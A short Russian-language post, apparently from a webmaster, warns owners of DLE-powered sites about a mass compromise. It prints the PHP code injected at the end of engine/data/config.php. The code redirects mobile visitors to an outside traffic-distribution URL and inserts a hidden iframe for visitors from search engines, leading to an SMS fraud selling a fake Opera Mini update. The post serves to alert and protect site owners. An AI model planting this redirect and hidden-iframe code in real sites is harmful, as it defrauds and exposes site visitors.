Очередная атака на DLE

Вчера все сайты на DLE были атакованы. В engine/data/config.php в конце был добавлен код:

if(preg_match('/midp|wap|windows ce|samsung|panasonic|nokia|pocket pc|android|netfront|sharp|portalmmm|blackberry|sagem|sgh|xda|ppc|240x320|sonyericsson|pocket pc|android|opera mini|mini|mobile symbian|sybmian/i', strtolower($_SERVER['HTTP_USER_AGENT']))) {header('Location: http://get.nyanphone.com/tds/auto?r=7329&l=4-5-6-7-8-9-10-11-27&ul=');exit();}

if(preg_match('/google|yandex|bing|yahoo/i', strtolower($_SERVER['HTTP_REFERER']))) {

    function nyancallback($buffer) {return (str_replace("</body>", '<iframe src="http://simple-counter.net/go.php?sid=1" width="0" height="0" frameborder="0"></iframe></body>', $buffer)); }

    ob_start("nyancallback");

} 

Он переадресовывал всех посетителей мобильных браузеров на сайты http://om65.ru или http://browser-up.ru, где предлагается фейковое обновление оперы мини за смс (разумеется не бесплатно).

Проверьте свои сайты и будьте бдительны.